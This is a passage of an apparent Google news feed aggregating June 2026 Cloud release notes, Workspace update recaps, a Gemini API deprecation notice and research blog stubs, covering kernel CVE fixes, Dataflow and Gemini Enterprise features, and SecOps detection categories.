&lt;p&gt;Fixed CVE-2026-46294 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46303 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46304 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46306 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed KCTF-def602e in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Updated dev-python/pyjwt to v2.13.0. This fixes
CVE-2026-48522, CVE-2026-48524, CVE-2026-48525, CVE-2026-485256.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Dataflow&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;Dataflow has updated and expanded its pipeline update features for
streaming jobs:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Automated stop-and-replace updates&lt;/strong&gt;: You can perform automated,
declarative stop-and-replace updates to streaming jobs.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Parallel updates with the same job name&lt;/strong&gt;: When you perform automated
parallel updates, you can use the same job name for the new replacement job.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Auto-cancel draining jobs&lt;/strong&gt;: When performing parallel or stop-and-replace
updates, you can configure Dataflow to automatically cancel
the old job if it does not finish draining after a timeout you specify.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Update strategy configuration&lt;/strong&gt;: You can explicitly choose between a
parallel update (&lt;code&gt;update_strategy_parallel_job_update&lt;/code&gt;) and a standard
in-place update (&lt;code&gt;update_strategy_in_place_update&lt;/code&gt;) while keeping all other
configuration the same.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Template upsert functionality&lt;/strong&gt;: When launching pipelines from classic
templates, flex templates, Terraform, or Config Connector, you can use the
&lt;code&gt;create_or_update_job&lt;/code&gt; experiment to enable automatic create-or-update
(upsert) behavior. If an active job with the specified name already exists,
it is updated. Otherwise, a new job is created.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For more information, see &lt;a href="https://docs.cloud.google.com/dataflow/docs/guides/upgrade-guide#automated-stop-replace"&gt;Automated stop and
replace&lt;/a&gt;, &lt;a href="https://docs.cloud.google.com/dataflow/docs/guides/upgrade-guide#automated-parallel-updates"&gt;Automated
parallel pipeline
updates&lt;/a&gt;, and
&lt;a href="https://docs.cloud.google.com/dataflow/docs/guides/upgrade-guide#templates-create-or-update"&gt;Automatic create or update (upsert) for
templates&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Gemini&lt;/h2&gt;
&lt;h3&gt;Other&lt;/h3&gt;
&lt;h3 id="bug_fixes_in_vs_code"&gt;Bug fixes in VS Code&lt;/h3&gt;
&lt;p&gt;Various bug fixes and minor product enhancements.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Gemini Enterprise&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Gemini Enterprise: New data stores and support for new actions (Public Preview)&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The following data stores are available in Public Preview:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/connectors/airops"&gt;AirOps&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/connectors/airtable"&gt;Airtable&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/connectors/calendly"&gt;Calendly&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/connectors/dynamics365"&gt;Dynamics 365&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/connectors/freshservice"&gt;Freshservice&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/connectors/googlestitch"&gt;Google Stitch&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/connectors/intercom"&gt;Intercom&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/connectors/mailerlite"&gt;MailerLite&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/connectors/zohocrm"&gt;Zoho CRM&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Additionally, support for new actions is available for the following data
stores:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/connectors/smartsheet"&gt;Smartsheet&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/connectors/wrike"&gt;Wrike&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/connectors/zohoprojects"&gt;Zoho Projects&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For more information, see
&lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/connectors/connect-third-party-data-source"&gt;Connect a third-party data source&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Gemini Enterprise: Observability settings for individual agents (Preview)&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;You can now configure observability settings for individual agents in
Agent Designer employee-made agents. This allows you to monitor metrics in
Metrics Explorer and view trace results in Trace Explorer for specific
agents.&lt;/p&gt;
&lt;p&gt;Observability settings for individual agents are configured inside the
agent-level settings. Previously, observability was only available at the
application level, which applies to the Core Assistant agent.&lt;/p&gt;
&lt;p&gt;This feature is in Public Preview. For more information, see
&lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/manage-observability-settings"&gt;Manage observability settings&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Gemini Enterprise Agent Platform&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Reinforcement Learning fine-tuning is available for Gemini 3.5 Flash in Public Preview&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Reinforcement Learning fine-tuning is now available for the &lt;code&gt;gemini-3.5-flash&lt;/code&gt; models in
&lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;Preview&lt;/a&gt;. Model tuning
for Gemini 3.5 Flash is restricted to &lt;code&gt;us-central1&lt;/code&gt; and &lt;code&gt;europe-west4&lt;/code&gt;, and tuned
model serving is restricted to the &lt;code&gt;us&lt;/code&gt; and &lt;code&gt;eu&lt;/code&gt; multi-region endpoints.&lt;/p&gt;
&lt;p&gt;See &lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/models/tuning/reinforcement-tuning"&gt;About reinforcement learning fine-tuning&lt;/a&gt;
for more information.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Google Cloud Contact Center as a Service&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Advanced reporting dashboards 4.36&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;We've released version 4.36 of the advanced reporting dashboards.&lt;/p&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;New child queues filter option&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Dashboards that have the &lt;strong&gt;Queue Name&lt;/strong&gt; filter now also have a &lt;strong&gt;Child Queues&lt;/strong&gt;
checkbox. Select &lt;strong&gt;Yes&lt;/strong&gt; if you want to include all child queues of the
specified queue. There's also a new &lt;strong&gt;Child Queues (Yes / No)&lt;/strong&gt; filter available
in Explores that have the &lt;strong&gt;Queue Name&lt;/strong&gt; filter.&lt;/p&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;The Agent &amp;amp; Queue Status (Live) Explore contains new real-time agent and queue metrics&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The &lt;strong&gt;Agent &amp;amp; Queue Status (Live)&lt;/strong&gt; Explore contains the following new metrics:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;In Call&lt;/strong&gt;: the number of agents currently on a call&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Available / Waiting&lt;/strong&gt;: the number of agents available and waiting for the
next contact&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Contacts in Queue&lt;/strong&gt;: the number of calls currently waiting in the queue&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Link directly to CSAT scores in your CRM from the CSAT dashboards&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;In the &lt;strong&gt;CSAT Interactions&lt;/strong&gt; table of the &lt;strong&gt;CSAT - Calls&lt;/strong&gt; and &lt;strong&gt;CSAT - Chats&lt;/strong&gt;
dashboards, next to the &lt;strong&gt;Session ID&lt;/strong&gt; numbers, links to the associated CSAT
scores in your CRM are now available. You can go directly to the CSAT scores
without needing to search for them in your CRM.&lt;/p&gt;
&lt;p&gt;For more information, see &lt;a href="https://docs.cloud.google.com/contact-center/ccai-platform/docs/dashboards-csat"&gt;CSAT dashboards&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Updates to the Real-time Queue Monitoring - Calls dashboard&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The &lt;strong&gt;Real-time Queue Monitoring - Calls&lt;/strong&gt; dashboard now includes the following
metrics tiles:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Total Rolled Over Pending Callbacks&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Total Rolled Over Completed Callbacks&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Avg CSAT Calls&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For more information, see &lt;a href="https://docs.cloud.google.com/contact-center/ccai-platform/docs/dashboards-real-time-queue-monitor"&gt;Queue monitoring dashboards&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Updates to the Queue Performance dashboards&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;The &lt;strong&gt;Queue Performance - Calls&lt;/strong&gt; and &lt;strong&gt;Queue Performance - Chats&lt;/strong&gt;
dashboards now include the following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;A new &lt;strong&gt;Interaction Type&lt;/strong&gt; filter&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;A new &lt;strong&gt;Interaction Type&lt;/strong&gt; column in the &lt;strong&gt;Queue Detailed Table&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;The &lt;strong&gt;Queue Performance - Calls&lt;/strong&gt; dashboard now includes the following
metrics tiles:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Total Rolled Over Completed Callbacks&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Total Rolled Over Pending Callbacks&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Repeat contact data in the Queue Performance dashboards&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The &lt;strong&gt;Queue Summary Table&lt;/strong&gt; of the &lt;strong&gt;Queue Performance - Calls&lt;/strong&gt; and &lt;strong&gt;Queue
Performance - Chats&lt;/strong&gt; dashboards now includes the following columns:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Total Repeat Contacts&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Repeat Contact %&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For more information, see &lt;a href="https://docs.cloud.google.com/contact-center/ccai-platform/docs/dashboards-queue-performance"&gt;Queue Performance dashboards&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;p&gt;The following issues were addressed in this release:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Fixed an issue where &lt;strong&gt;Repeat Contact %&lt;/strong&gt; values in the &lt;strong&gt;Queue Summary
Table&lt;/strong&gt; of the &lt;strong&gt;Queue Performance - Calls&lt;/strong&gt; dashboard exceeded 100%.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Fixed an issue where the &lt;strong&gt;Date&lt;/strong&gt; filter in Explores returned no results
when &lt;strong&gt;is on or after&lt;/strong&gt; was set for an absolute date.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Removed the &lt;strong&gt;Total Logged in Time&lt;/strong&gt; metrics tile from the &lt;strong&gt;Agent
Availability&lt;/strong&gt; dashboard.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Fixed an issue where language labels were missing from the advanced
reporting dashboards.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Fixed an issue that occurred when filtering by chat ID in the &lt;strong&gt;All
Interactions - Chats&lt;/strong&gt; dashboard. The wrong chat ID appeared in the
&lt;strong&gt;Virtual Agent Chats&lt;/strong&gt; table.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Fixed an issue where disposition codes were missing or blank for outbound
calls in the &lt;strong&gt;Call Agent Metrics (Historical)&lt;/strong&gt; dashboard.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 class="release-note-product-title"&gt;Google Distributed Cloud (software only) for VMware&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;Starting with Distributed Cloud software only for VMware version
1.33.0-gke.799, you must add &lt;code&gt;us.gcr.io&lt;/code&gt; to your firewall allowlist to
create or upgrade advanced clusters.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Identity and Access Management&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;You can use the error ID provided in permission error messages to help
troubleshoot access. Error IDs provide context for the error, including the
principal, resource, permission, and supported IAM conditions.
This feature is available in
&lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;Preview&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;For more information, see
&lt;a href="https://docs.cloud.google.com/iam/docs/permission-error-messages"&gt;Permission error messages&lt;/a&gt;.&lt;/p&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#June_15_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-06-15T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://ai.google.dev/gemini-api/docs/changelog#06-15-2026</id>
    <title>Gemini API — 2026-06-15</title>
    <updated>2026-06-15T00:00:00+00:00</updated>
    <content type="text">Ogłoszenie o wycofaniu: te modele generowania obrazów zostaną wycofane i wyłączone 17 sierpnia 2026 r. : Modele Imagen 4 i Gemini 3 Image: imagen-4.0-generate-001 imagen-4.0-ultra-generate-001 imagen-4.0-fast-generate-001 Aby przenieść kod do nowszych stabilnych lub testowych punktów końcowych, zapoznaj się ze stroną Wycofywanie Gemini . Ogłoszenie o wycofaniu: te modele do generowania filmów zostaną wycofane i wyłączone 30 czerwca 2026 r.: Modele Veo: veo-2.0-generate-001 veo-3.0-generate-001 veo-3.0-fast-generate-001 Aby uniknąć przerw w działaniu usługi, zaktualizuj integrację, aby korzyst…</content>
    <link href="https://ai.google.dev/gemini-api/docs/changelog#06-15-2026" rel="alternate"/>
    <category term="Gemini API"/>
    <published>2026-06-15T00:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/company-news/inside-google/message-ceo/stanford-commencement-speech-2026/</id>
    <title>Read Sundar Pichai’s 2026 Commencement Address at Stanford University</title>
    <updated>2026-06-14T17:30:00+00:00</updated>
    <content type="html">a gradient G</content>
    <link href="https://blog.google/company-news/inside-google/message-ceo/stanford-commencement-speech-2026/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-14T17:30:00+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#June_14_2026</id>
    <title>Cloud Release Notes — June 14, 2026</title>
    <updated>2026-06-14T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;Google SecOps SOAR&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;Release 6.3.89 is being rolled out to the first phase of regions as listed &lt;a href="https://docs.cloud.google.com/chronicle/docs/soar/overview-and-introduction/soar-gradual-release"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This release contains internal and customer bug fixes.&lt;/p&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#June_14_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-06-14T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#June_13_2026</id>
    <title>Cloud Release Notes — June 13, 2026</title>
    <updated>2026-06-13T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;Google SecOps&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Non-prioritized IoC Matching rules Category&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Google SecOps has introduced a new detection category, &lt;em&gt;Non-prioritized IoC Matching rules&lt;/em&gt;, as part of the &lt;a href="https://docs.cloud.google.com/chronicle/docs/detection/curated-detections"&gt;Curated Detections&lt;/a&gt; feature. These rule sets integrate with Google's Indicators of Compromise (IoC) feeds and build on curated threat intelligence to identify malicious activities within Google SecOps environments, specifically focusing on threats identifiable through high-fidelity indicators like IPs, domains, and file hashes.&lt;/p&gt;
&lt;p&gt;This rules category provides comprehensive coverage for threats often missed by standard managed content, including cryptomining, Command and Control (C2) communications, and the use of malicious anonymization services.&lt;/p&gt;
&lt;p&gt;For more information, refer to &lt;a href="https://docs.cloud.google.com/chronicle/docs/detection/non-prioritized-ioc-matching-threats-category"&gt;Non-prioritized IoC Matching rules category overview&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Google SecOps SIEM&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Non-prioritized IoC Matching rules Category&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Google SecOps has introduced a new detection category, &lt;em&gt;Non-prioritized IoC Matching rules&lt;/em&gt;, as part of the &lt;a href="https://docs.cloud.google.com/chronicle/docs/detection/curated-detections"&gt;Curated Detections&lt;/a&gt; feature. These rule sets integrate with Google's Indicators of Compromise (IoC) feeds and build on curated threat intelligence to identify malicious activities within Google SecOps environments, specifically focusing on threats identifiable through high-fidelity indicators like IPs, domains, and file hashes.&lt;/p&gt;
&lt;p&gt;This rules category provides comprehensive coverage for threats often missed by standard managed content, including cryptomining, Command and Control (C2) communications, and the use of malicious anonymization services.&lt;/p&gt;
&lt;p&gt;For more information, refer to &lt;a href="https://docs.cloud.google.com/chronicle/docs/detection/non-prioritized-ioc-matching-threats-category"&gt;Non-prioritized IoC Matching rules category overview&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Google SecOps SOAR&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://docs.cloud.google.com/chronicle/docs/soar/release-notes#June_07_2026"&gt;Release 6.3.88&lt;/a&gt; is now available for all regions.&lt;/p&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#June_13_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-06-13T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/06/weekly-recap-06-12-2026.html</id>
    <title>Google Workspace Updates Weekly Recap - June 12, 2026</title>
    <updated>2026-06-12T19:30:58+00:00</updated>
    <content type="html">&lt;h3 style="text-align: left;"&gt;Request lightweight document alignment with approvals in Google Drive&lt;/h3&gt;&lt;div&gt;Google Drive is introducing alignment approvals, a lightweight mechanism that allows teams to request and record document sign-offs without file changes resetting the approval flow. When a document is in a partially approved state, collaborators can continue making edits without resetting any recorded approver decisions. | Learn more about &lt;a href="https://workspaceupdates.googleblog.com/2026/06/request-lightweight-document-alignment-with%20approvals%20in%20Google%20Drive.html" target="_blank"&gt;how to request lightweight document alignment with approvals in Google Drive&lt;/a&gt;.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Convert rubric files and images into Google Classroom rubrics with help from Gemini&lt;/h3&gt;&lt;div&gt;With this launch, rubric conversion will be controlled by the Gemini in Classroom setting in the Admin console. | Learn more about &lt;a href="https://workspaceupdates.googleblog.com/2026/06/convert-rubric-files-and-images-into-Google-Classroom-rubrics-with-help-from-Gemini.html" target="_blank"&gt;how to convert rubric files and images into Google Classroom rubrics with help from Gemini&lt;/a&gt;.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Introducing the Workspace Policy API mutate endpoints for DLP&lt;/h3&gt;&lt;div&gt;With our latest update, we are introducing mutate endpoints (Create, Update, Delete) alongside existing read-only capabilities (Get, List) for data loss prevention (DLP) rules and detectors. This allows super admins to programmatically manage and fully automate the entire lifecycle of their DLP policies, from initial creation to real-time activation and deactivation. | Learn more about &lt;a href="https://workspaceupdates.googleblog.com/2026/06/introducing-workspace-policy-api-mutate-endpoints-for-DLP.html" target="_blank"&gt;the Workspace Policy API mutate endpoints for DLP&lt;/a&gt;.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Google Meet now supports sending 1080p HD video from ChromeOS meeting room hardware&lt;/h3&gt;&lt;div&gt;We previously launched support for sending full HD video (1080p) in Meet on the web, and we’re now extending that capability to Google Meet room hardware based on ChromeOS. | Learn more about &lt;a href="https://workspaceupdates.googleblog.com/2026/06/google-meet-now-supports-sending-1080p-HD-video-from-ChromeOS-meeting-room-hardware.html" target="_blank"&gt;Google Meet now supports sending 1080p HD video from ChromeOS meeting room hardware&lt;/a&gt;.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Google Vault now supports retention rules and litigation holds for Gemini app&lt;/h3&gt;&lt;div&gt;Google Vault now supports retention rules and litigation holds for the Gemini app on web and mobile. Previously, administrators were able to use Vault to search Gemini app conversations and export those search results. | Learn more about &lt;a href="https://workspaceupdates.googleblog.com/2026/06/google-vault-now-supports-retention-rules-and-litigation-holds-for-Gemini-app.html" target="_blank"&gt;Google Vault now supports retention rules and litigation holds for Gemini app&lt;/a&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size: x-small;"&gt;The announcements above were published on the Workspace Updates blog over the last week. Please refer to the original blog posts for complete details.&lt;/span&gt;&lt;/div&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/06/weekly-recap-06-12-2026.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-12T19:30:58+00:00</published>
  </entry>
  <entry>
    <id>http://workspaceupdates.googleblog.com/2026/06/weekly-recap-06-12-2026.html</id>
    <title>Google Workspace Updates Weekly Recap - June 12, 2026</title>
    <updated>2026-06-12T19:30:58+00:00</updated>
    <content type="html">&lt;h3 style="text-align: left;"&gt;Request lightweight document alignment with approvals in Google Drive&lt;/h3&gt;&lt;div&gt;Google Drive is introducing alignment approvals, a lightweight mechanism that allows teams to request and record document sign-offs without file changes resetting the approval flow. When a document is in a partially approved state, collaborators can continue making edits without resetting any recorded approver decisions. | Learn more about &lt;a href="https://workspaceupdates.googleblog.com/2026/06/request-lightweight-document-alignment-with%20approvals%20in%20Google%20Drive.html" target="_blank"&gt;how to request lightweight document alignment with approvals in Google Drive&lt;/a&gt;.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Convert rubric files and images into Google Classroom rubrics with help from Gemini&lt;/h3&gt;&lt;div&gt;With this launch, rubric conversion will be controlled by the Gemini in Classroom setting in the Admin console. | Learn more about &lt;a href="https://workspaceupdates.googleblog.com/2026/06/convert-rubric-files-and-images-into-Google-Classroom-rubrics-with-help-from-Gemini.html" target="_blank"&gt;how to convert rubric files and images into Google Classroom rubrics with help from Gemini&lt;/a&gt;.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Introducing the Workspace Policy API mutate endpoints for DLP&lt;/h3&gt;&lt;div&gt;With our latest update, we are introducing mutate endpoints (Create, Update, Delete) alongside existing read-only capabilities (Get, List) for data loss prevention (DLP) rules and detectors. This allows super admins to programmatically manage and fully automate the entire lifecycle of their DLP policies, from initial creation to real-time activation and deactivation. | Learn more about &lt;a href="https://workspaceupdates.googleblog.com/2026/06/introducing-workspace-policy-api-mutate-endpoints-for-DLP.html" target="_blank"&gt;the Workspace Policy API mutate endpoints for DLP&lt;/a&gt;.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Google Meet now supports sending 1080p HD video from ChromeOS meeting room hardware&lt;/h3&gt;&lt;div&gt;We previously launched support for sending full HD video (1080p) in Meet on the web, and we’re now extending that capability to Google Meet room hardware based on ChromeOS. | Learn more about &lt;a href="https://workspaceupdates.googleblog.com/2026/06/google-meet-now-supports-sending-1080p-HD-video-from-ChromeOS-meeting-room-hardware.html" target="_blank"&gt;Google Meet now supports sending 1080p HD video from ChromeOS meeting room hardware&lt;/a&gt;.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Google Vault now supports retention rules and litigation holds for Gemini app&lt;/h3&gt;&lt;div&gt;Google Vault now supports retention rules and litigation holds for the Gemini app on web and mobile. Previously, administrators were able to use Vault to search Gemini app conversations and export those search results. | Learn more about &lt;a href="https://workspaceupdates.googleblog.com/2026/06/google-vault-now-supports-retention-rules-and-litigation-holds-for-Gemini-app.html" target="_blank"&gt;Google Vault now supports retention rules and litigation holds for Gemini app&lt;/a&gt;.&lt;/div&gt;</content>
    <link href="http://workspaceupdates.googleblog.com/2026/06/weekly-recap-06-12-2026.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-12T19:30:58+00:00</published>
  </entry>
  <entry>
    <id>https://research.google/blog/research-into-how-ai-can-help-users-understand-skin-conditions</id>
    <title>Research into how AI can help users understand skin conditions</title>
    <updated>2026-06-12T17:52:00+00:00</updated>
    <content type="html">Health &amp; Bioscience</content>
    <link href="https://research.google/blog/research-into-how-ai-can-help-users-understand-skin-conditions" rel="alternate"/>
    <category term="Google Research"/>
    <published>2026-06-12T17:52:00+00:00</published>
  </entry>
  <entry>
    <id>https://research.google/blog/research-into-how-ai-can-help-users-understand-skin-conditions/</id>
    <title>Research into how AI can help users understand skin conditions</title>
    <updated>2026-06-12T17:52:00+00:00</updated>
    <content type="html">Health &amp; Bioscience</content>
    <link href="https://research.google/blog/research-into-how-ai-can-help-users-understand-skin-conditions/" rel="alternate"/>
    <category term="Google Research"/>
    <published>2026-06-12T17:52:00+00:00</published>
  </entry>
  <entry>
    <id>https://research.google/blog/a-low-carbon-computing-platform-from-your-retired-phones</id>
    <title>A low-carbon computing platform from your retired phones</title>
    <updated>2026-06-12T17:37:00+00:00</updated>
    <content type="html">Climate &amp; Sustainability</content>
    <link href="https://research.google/blog/a-low-carbon-computing-platform-from-your-retired-phones" rel="alternate"/>
    <category term="Google Research"/>
    <published>2026-06-12T17:37:00+00:00</published>
  </entry>
  <entry>
    <id>https://research.google/blog/a-low-carbon-computing-platform-from-your-retired-phones/</id>
    <title>A low-carbon computing platform from your retired phones</title>
    <updated>2026-06-12T17:37:00+00:00</updated>
    <content type="html">Climate &amp; Sustainability</content>
    <link href="https://research.google/blog/a-low-carbon-computing-platform-from-your-retired-phones/" rel="alternate"/>
    <category term="Google Research"/>
    <published>2026-06-12T17:37:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/data-analytics/how-the-open-knowledge-format-can-improve-data-sharing/</id>
    <title>Introducing the Open Knowledge Format</title>
    <updated>2026-06-12T13:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As foundation models continue to improve, the lack of relevant context often limits what they can do, especially as they are used to build agentic systems. While these models can help you write code, summarize documents, or analyze a dataset, they still need the right information to produce accurate and actionable results. &lt;/span&gt;&lt;/p&gt;
